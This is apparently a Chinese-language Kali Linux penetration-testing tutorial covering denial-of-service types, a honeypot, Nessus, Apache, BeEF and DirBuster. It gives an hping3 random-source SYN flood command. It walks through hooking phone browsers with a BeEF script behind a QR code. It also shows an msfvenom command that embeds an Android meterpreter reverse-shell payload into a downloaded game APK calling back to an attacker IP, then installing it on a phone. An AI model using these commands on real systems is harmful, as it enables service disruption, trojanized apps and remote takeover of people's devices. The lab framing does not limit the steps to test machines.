1、拒絕服務攻擊
使用某些手段故意佔用某一系統對外服務的有限資源,從而導致其無法正常工作的行為就是拒絕服務攻擊。實際上拒絕服務攻擊並不是一個攻擊方式,它是一類具有相似特徵的攻擊方式的集合。拒絕服務攻擊有以下分類:
1. 資料鏈路層的拒絕服務攻擊
攻擊目標:交換機
集線器:以前的內網都是用集線器,集線器不具備“學習”和“記憶”功能,多臺機器在通訊的時候,都是將資訊發給所有的機器,如果不是對應的機器接收到,就不做應答。它的缺點是,我們可以很簡單的獲取到整個網路內的所有資訊。
交換機:交換機有學習和記憶的功能,在交換機內部有一個CAM的表,這個表可以記錄交換機每個介面對應的計算機的MAC地址資訊,有了這些資訊,在傳輸資料的時候就可以一對一傳輸。
拒絕服務攻擊利用方法:CAM表容量有限,如果我們在短時間內製造大量的不同源的MAC地址發來的資料包,CAM表就會被佔滿,導致交換機無法正常工作。
2.網路層的拒絕服務攻擊
TCP和UDP就位於這一層,而基於TCP的拒絕服務攻擊,就是大家常說的拒絕服務攻擊。大部分的伺服器都是提供HTTP服務的伺服器,HTTP協議就是TCP提供的支援。基於TCP的拒絕服務攻擊有兩種:
- 和目標埠完成三次握手,建立一個完整連結
- 只和目標埠完成三次握手的前兩次,建立一個不完整的連結,這種方式最常用。
利用工具:hping3。實驗靶機:Metasploitable2。
命令:hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source [目標ip]
3.傳輸層的拒絕服務攻擊
4.基於應用層的拒絕服務攻擊
5.DDOS攻擊
大家常說的DDOS攻擊,翻譯過來就是分散式拒絕服務攻擊,也就是很多的機器同時對目標發起拒絕服務攻擊,這就是為什麼DDOS往往和肉雞這個詞一起出現的原因。
2、用Kali Linux 蜜罐引誘可能的攻擊者進入陷阱
什麼是蜜罐?許多安全專家都喜歡的一個東西就是蜜罐。簡單地說,蜜罐是模擬特定網路攻擊目標的系統。有了蜜罐,管理員可以檢測並記錄對某些服務發起的網路攻擊,以及發起攻擊的IP地址。建立一個蜜罐是相當簡單的,使用Kali Linux和pentbox組合,可以在幾分鐘內啟動和執行一個蜜罐。
可以使用以下命令下載蜜罐:
wget http://downloads.sourceforge.net/project/pentbox18realised/pentbox-1.8.tar.gz
執行pentbox Ruby指令碼:
./pentbox.rb
然後會看到一個選單,在選單中選擇2(用於網路工具),然後選擇3(用於蜜罐)。
然後會讓你選擇快捷設定還是手動設定,如果快捷設定報錯了,那麼可以使用手動設定,比如埠被佔用等。
然後可以用另外一臺電腦來訪問該kali的ip地址,別忘了加埠號。
然後就沒有然後了。
3、Nessus
Nessus是目前全世界最多人使用的系統漏洞掃描和分析工具。
1、安裝
- 下載地址:https://www.tenable.com/downloads/nessus?loginAttempted=true。
- 下載kali linux的版本。注意要在kali的系統裡的瀏覽器裡下載哦。
- 然後,在你下載的那個資料夾裡右鍵開啟終端:
- 然後輸入:sudo dpkg -i [安裝包名]。
- 開啟服務,命令已經告訴你了。sudo /bin/systemctl start nessusd.service
- 開啟瀏覽器,訪問上圖中的連結地址。然後會出現個提示,就跟Windows訪問不安全的地址一樣,點灰色的按鈕,接受就好了。
- 點選下一步,輸入郵箱和姓名(隨便寫好伐)。
- 然後回車,然後會發給你一封信,信裡有Activation Code,輸入Activation Code
- 然後會輸入使用者名稱和密碼。
- 然後就會更新軟體,就完事了,當然也可能會失敗。
2、使用方法
暫不介紹,自行百度。
4、Apache服務的使用方法
Apache是世界使用排名第一的web伺服器軟體。它可以執行在幾乎所有廣泛使用的計算機平臺上,由於其跨平臺和安全性被廣泛使用,是最流行的Web伺服器端軟體之一。
執行一個網站,可以作為檔案上傳下載的中轉站。其實我們們之前都玩過了。
啟動apache服務:sudo service apache2 start。
5、掃碼控制
實踐步驟:
- 修改虛擬機器的聯網模式為橋接模式
- 啟動beef框架,開啟後設定一個你記得住的密碼。
- 複製網站模板(隨便百度靜態網站模板,就是靜態的html頁面)到kali中,把hook.js檔案加入到模板的首頁中。
把這段js指令碼程式碼,放到如下圖所示即可,注意,看到下面紅框裡的<IP>沒有?改成你的主機IP,就完事了。
- 把網站模板複製到Apache目錄下:
- 先把apache目錄中原有的檔案都刪除掉:sudo rm -rf *。
- 然後把剛才的index.html模板複製到該目錄下,之前學過這命令,不說了
- 啟動apache服務。也說過,再不知道回去看。
- 將網站首頁的連結製作成二維碼。透過草料二維碼,把連結地址轉換成二維碼就可以了。
- 登入beef頁面,地址在這裡:
預設的使用者名稱就是beef,密碼就是剛才你設定的:
就進來了。
- 用手機掃描二維碼。
- 然後你就可以在瀏覽器的beef標籤裡檢視了。
所以!不要輕易掃碼!!!
6、在軟體中植入Payload
1.首先我下載了一個遊戲,你自己隨便下載。
2.在app中植入payload。啥意思不說了哈,都知道了。
sudo msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.199.124 lport=6666 -x /home/zakingwong/game_old.apk R>/home/zakingwong/new.apk
3.然後開啟主控端,進入meterpreter。
4.透過apache把apl傳送到你的安卓手機上。
5.安裝並開啟遊戲。
6.然後,做之前學過的事吧!
7、DirBuster目錄爆破
要相對一個目標站點做滲透測試,首先要搞清楚的就是目標的目錄結構。這個任務可以交給DirBuster來做。DirBuster是一個多執行緒Java應用程式,可以破解Web應用程式伺服器上的目錄和檔名。DirBuster自帶字典檔案,當然我們可以根據收集到的其他資訊,針對性的生成更加好用的字典檔案。
使用方法,要想使用DirBuster只需要簡單的四部操作,實驗靶機是owasp linux伺服器:
- 設定目標網站網址(在kali中搜尋DirBuster就能找到了):
- 設定軟體掃碼的速度,也就是執行緒數。預設為10,我們可以根據自己的需求設定,如果目標站點頻寬不夠且執行緒數太高,會導致目標站點無法正常訪問。拖拽修改即可。
- 設定字典檔案。字典可以使我們根據已收集到的資訊對應生成的字典。也可以是dirbuster預設自帶的幾個字典。dirbuster自帶的字典檔案在/usr/share/dirbuster/wordlists/目錄下。
- 這些不用動,點start就可以了。
- 然後,我們可以在下圖的tabs中檢視各種掃描結果資訊